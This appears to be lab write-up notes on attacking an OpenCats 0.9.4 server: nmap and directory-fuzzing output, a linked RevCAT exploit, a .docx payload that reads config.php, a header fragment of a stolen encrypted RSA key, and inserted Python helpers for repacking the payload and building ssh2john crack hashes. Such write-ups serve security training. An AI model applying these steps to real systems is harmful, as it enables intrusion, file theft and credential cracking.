#### Ports
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 27:82:2f:11:32:ed:f2:16:80:6c:1f:58:70:db:23:02 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDje0H9Fac/ESO7mXKoLNV4omG15KKoEYGlHf7vx3Xj/C/0Ad2ZwZiGFECTqyrL9wCrocf7YzUHJ6hP1JV3g+HzNlATf6utCdnGBgOh60OescS24rpcn22Jka4hoWaLUr/gDWblUgS9s/s9zi0KLWpgewGAFGsN8V8O9M2PIcqXM39+zNb6Qaxu4UfGm+kCu3RcotMVx50LJG2d3XSaJnoBxWmjEmR236k+7YtYS1AnZUL67d4EMaKfG3ThSf4+auKNQCyNIvYAjCXMDABdZ3Np+EcnmzZnVSLSsAQgNGtePBHpx1V5WFSrwSgpqzyD/lVrgOJBtip7yEIGk9lgIwpx
|   256 bd:f8:6f:63:ca:92:c2:23:73:0e:43:bf:a7:f6:6d:c2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD27xCr3Ej3LxvwtFPQrgIloZuZ77XaFSwUBT0yxfoHLhdiogpVJ+oiQG15afzdjkPTddjy2oyIw4a2LW6cXIzE=
|   256 8a:f1:d9:33:fa:d1:74:4d:30:6a:36:8a:70:79:84:4c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILlkXtsTGTbiTf3XfxmY6Wwh5Yj57tJa4H1tq1woJjcJ

80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: P\xC3\xA1gina Inicial
|_http-generator: Nicepage 3.25.5, nicepage.com
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

#### Services
Apache httpd 2.4.29
OpenSSH 7.6p1
OpenCats 0.9.4 -> Payload <https://github.com/Nickguitar/RevCAT/blob/main/RevCAT.sh>

#### FUZZ

Target: <http://10.9.2.13/FUZZ>
Total requests: 4713

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                  
=====================================================================

000000025:   403        9 L      28 W       274 Ch      ".htaccess"                                                                                              
000000024:   403        9 L      28 W       274 Ch      ".hta"                                                                                                   
000000026:   403        9 L      28 W       274 Ch      ".htpasswd"                                                                                              
000000728:   301        9 L      28 W       307 Ch      "assets"                                                                                                 
000002165:   301        9 L      28 W       307 Ch      "images"                                                                                                 
000002192:   200        340 L    1845 W     34691 Ch    "index.html"                                                                                             
000003710:   403        9 L      28 W       274 Ch      "server-status"

Target: <http://10.9.2.13/opencats/FUZZ>
Total requests: 4713

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                  
=====================================================================

000000009:   301        9 L      28 W       314 Ch      ".git"                                                                                                   
000000012:   200        8 L      21 W       210 Ch      ".git/config"                                                                                            
000000018:   200        8 L      9 W        106 Ch      ".gitignore"                                                                                             
000000011:   200        1 L      1 W        41 Ch       ".git/HEAD"                                                                                              
000000014:   200        16 L     60 W       965 Ch      ".git/logs/"                                                                                             
000000026:   403        9 L      28 W       274 Ch      ".htpasswd"                                                                                              
000000025:   403        9 L      28 W       274 Ch      ".htaccess"                                                                                              
000000024:   403        9 L      28 W       274 Ch      ".hta"                                                                                                   
000000013:   200        3194 L   6837 W     142777 Ch   ".git/index"                                                                                             
000000599:   301        9 L      28 W       314 Ch      "ajax"                                                                                                   
000000734:   301        9 L      28 W       321 Ch      "attachments"                                                                                            
000000986:   301        9 L      28 W       317 Ch      "careers"                                                                                                
000001094:   301        9 L      28 W       318 Ch      "ckeditor"                                                                                               
000001374:   301        9 L      28 W       312 Ch      "db"                                                                                                     
000002165:   301        9 L      28 W       316 Ch      "images"                                                                                                 
000002193:   200        101 L    291 W      3671 Ch     "index.php"                                                                                              
000002349:   301        9 L      28 W       312 Ch      "js"                                                                                                     
000002443:   301        9 L      28 W       313 Ch      "lib"                                                                                                    
000002719:   301        9 L      28 W       317 Ch      "modules"                                                                                                
000003584:   301        9 L      28 W       313 Ch      "rss"                                                                                                    
000003650:   301        9 L      28 W       317 Ch      "scripts"                                                                                                
000003916:   301        9 L      28 W       313 Ch      "src"                                                                                                    
000004092:   301        9 L      28 W       314 Ch      "temp"                                                                                                   
000004108:   301        9 L      28 W       314 Ch      "test"                                                                                                   
000004303:   301        9 L      28 W       316 Ch      "upload"                                                                                                 
000004380:   301        9 L      28 W       316 Ch      "vendor"                                                                                                 
000004604:   301        9 L      28 W       314 Ch      "wsdl"                                                                                                   
000004642:   301        9 L      28 W       313 Ch      "xml"

The payload is delivered in a .docx. If the payload needs changing, run `unzip word2.docx`, edit `word/document.xml`, and repack from inside the extracted directory so the entry paths stay relative (a .docx is just a ZIP, and the target's parser rejects it if `[Content_Types].xml` is not at the archive root).
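Added example (not from these notes and not the RevCAT script): rewriting `word/document.xml` inside a .docx without touching the other entries, plus a sanity check for the usual repacking mistake (paths prefixed with the extraction directory, which drops `[Content_Types].xml` from the root). The archive contents and the replacement XML are constructed placeholders, not the real payload; `decode_exfil` covers the base64 that comes back when the payload reads a file such as config.php.

```python
"""Rewrite one entry of a .docx (a ZIP) in place and verify the result.

Added example, not the page's or RevCAT's code. Entry bodies below are
constructed placeholders; the real payload XML is in word2.docx.
"""
import base64
import io
import zipfile

# Constructed minimal .docx skeleton (placeholders, not valid WordprocessingML).
MINIMAL_DOCX_ENTRIES = {
    "[Content_Types].xml": "<Types>placeholder</Types>",
    "_rels/.rels": "<Relationships>placeholder</Relationships>",
    "word/document.xml": "<w:document>original body</w:document>",
}


def build_docx(entries: dict) -> bytes:
    """Build a ZIP from {entry_name: text}; used to construct test input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()


def list_entries(docx_bytes: bytes) -> list:
    return zipfile.ZipFile(io.BytesIO(docx_bytes)).namelist()


def read_entry(docx_bytes: bytes, entry: str) -> str:
    return zipfile.ZipFile(io.BytesIO(docx_bytes)).read(entry).decode()


def replace_entry(docx_bytes: bytes, entry: str, new_body: str) -> bytes:
    """Copy every entry unchanged except `entry`, which gets `new_body`.

    Copying entry by entry keeps names relative and keeps the rest of the
    package intact, which is what `zip -r` from the wrong directory breaks.
    """
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    if entry not in src.namelist():
        raise KeyError(f"{entry} not found in archive")
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = new_body.encode() if info.filename == entry else src.read(info)
            dst.writestr(info.filename, data)
    return out.getvalue()


def sanity_check(docx_bytes: bytes) -> list:
    """Return a list of problems a Word/OpenXML parser would choke on."""
    problems = []
    names = list_entries(docx_bytes)
    if "[Content_Types].xml" not in names:
        problems.append("missing [Content_Types].xml at archive root (repacked from wrong directory?)")
    if "word/document.xml" not in names:
        problems.append("missing word/document.xml")
    for n in names:
        if n.startswith("/") or ".." in n.split("/"):
            problems.append(f"unsafe entry path: {n}")
    return problems


def decode_exfil(text: str) -> str:
    """Decode base64 returned by the payload; tolerates stripped padding and whitespace."""
    s = "".join(text.split()).rstrip("=")
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode(errors="replace")


if __name__ == "__main__":
    doc = build_docx(MINIMAL_DOCX_ENTRIES)
    patched = replace_entry(doc, "word/document.xml", "<w:document>changed</w:document>")
    print(list_entries(patched), sanity_check(patched))
    bad = build_docx({"word2/" + k: v for k, v in MINIMAL_DOCX_ENTRIES.items()})
    print(sanity_check(bad))
```

Run `sanity_check` on the repacked file before uploading; the "missing [Content_Types].xml" case is exactly what `cd` into the wrong directory before `zip -r` produces.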

word2.docx

RSA private key obtained with the payload. In the payload we read the file config.php and base64-encode it.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,EFEEC109F12F7F7DCE3774683ECCB526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-----END RSA PRIVATE KEY-----

The key is passphrase-protected (`Proc-Type: 4,ENCRYPTED`, `DEK-Info: AES-128-CBC,...`), so next we use a John the Ripper helper to "convert" it into a format John can crack to recover the passphrase. We use ssh2john.py (shipped with the jumbo build). After conversion it looks like this:

idrsa:$sshng$1$16$EFEEC109F12F7F7DCE3774683ECCB526$1200$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
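Added example, not part of these notes and not John the Ripper's own ssh2john.py: a small reimplementation of the conversion for the legacy PEM case shown above, so the fields of the hash line are readable: `name:$sshng$<cipher>$<iv_len>$<iv_hex>$<data_len>$<data_hex>`. Cipher code 1 is AES-128-CBC (the value in the line above) and 0 is DES-EDE3-CBC; other ciphers and the newer OpenSSH key format are deliberately rejected rather than guessed. The key body used as input is constructed (48 bytes), only the IV is the one from the page; use the real ssh2john.py for cracking.

```python
"""Legacy PEM ("BEGIN RSA PRIVATE KEY" + Proc-Type/DEK-Info) -> $sshng$ line.

Added example mirroring the layout ssh2john emits for this key type; it is
not ssh2john.py. Sanity checks catch the two things that silently produce
an uncrackable hash: a wrong-length IV and a truncated base64 body.
"""
import base64
import binascii
import re

CIPHER_CODES = {"DES-EDE3-CBC": 0, "AES-128-CBC": 1}
BLOCK_SIZE = {"DES-EDE3-CBC": 8, "AES-128-CBC": 16}

# Constructed input: the IV is the one from the notes above, the 48-byte
# ciphertext is made up (a real 2048-bit RSA key is 1200 bytes).
IV_HEX = "EFEEC109F12F7F7DCE3774683ECCB526"
CONSTRUCTED_BODY = bytes(range(48))
CONSTRUCTED_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    f"DEK-Info: AES-128-CBC,{IV_HEX}\n"
    "\n"
    + base64.b64encode(CONSTRUCTED_BODY).decode() + "\n"
    "-----END RSA PRIVATE KEY-----\n"
)
CONSTRUCTED_PEM_PLAIN = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    + base64.b64encode(CONSTRUCTED_BODY).decode() + "\n"
    "-----END RSA PRIVATE KEY-----\n"
)


def _parse_pem(pem_text: str):
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    m = re.fullmatch(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", lines[0])
    if not m:
        raise ValueError("not a legacy PEM private key (new OpenSSH format not handled here)")
    tag = m.group(1)
    if lines[-1] != f"-----END {tag} PRIVATE KEY-----":
        raise ValueError("missing or mismatched END line")
    headers, i = {}, 1
    while i < len(lines) - 1 and ": " in lines[i]:       # RFC 1421 style headers
        k, v = lines[i].split(": ", 1)
        headers[k.lower()] = v
        i += 1
    body = "".join(lines[i:-1])
    return headers, base64.b64decode(body, validate=True)


def is_crackable(pem_text: str) -> bool:
    """True only when the PEM carries a passphrase (Proc-Type: 4,ENCRYPTED)."""
    headers, _ = _parse_pem(pem_text)
    return headers.get("proc-type") == "4,ENCRYPTED"


def pem_to_sshng(pem_text: str, name: str = "idrsa") -> str:
    headers, data = _parse_pem(pem_text)
    if headers.get("proc-type") != "4,ENCRYPTED":
        raise ValueError("key has no passphrase; nothing to crack")
    cipher_name, iv_hex = headers["dek-info"].split(",")
    if cipher_name not in CIPHER_CODES:
        raise ValueError(f"cipher {cipher_name} not handled by this example")
    iv = binascii.unhexlify(iv_hex)
    if len(iv) != BLOCK_SIZE[cipher_name]:
        raise ValueError("IV length does not match the cipher block size")
    if len(data) % BLOCK_SIZE[cipher_name]:
        raise ValueError("ciphertext is not a multiple of the block size (truncated copy?)")
    return f"{name}:$sshng${CIPHER_CODES[cipher_name]}${len(iv)}${iv_hex}${len(data)}${data.hex()}"


def explain_sshng(line: str) -> dict:
    """Split a $sshng$ line back into its fields and check the lengths agree."""
    name, rest = line.split(":", 1)
    _, tag, code, iv_len, iv_hex, data_len, data_hex = rest.split("$")
    if tag != "sshng":
        raise ValueError("not an sshng hash")
    code_to_name = {v: k for k, v in CIPHER_CODES.items()}
    if len(iv_hex) != 2 * int(iv_len) or len(data_hex) != 2 * int(data_len):
        raise ValueError("declared lengths do not match the hex fields")
    return {"name": name, "cipher": code_to_name.get(int(code), f"code {code}"),
            "iv_len": int(iv_len), "data_len": int(data_len)}


if __name__ == "__main__":
    line = pem_to_sshng(CONSTRUCTED_PEM)
    print(line)
    print(explain_sshng(line))
```

The length check in `explain_sshng` is worth running on a hash copied out of a report: the `1200` above must equal half the length of the hex tail, otherwise the key was truncated when it was pasted and John will never find the passphrase.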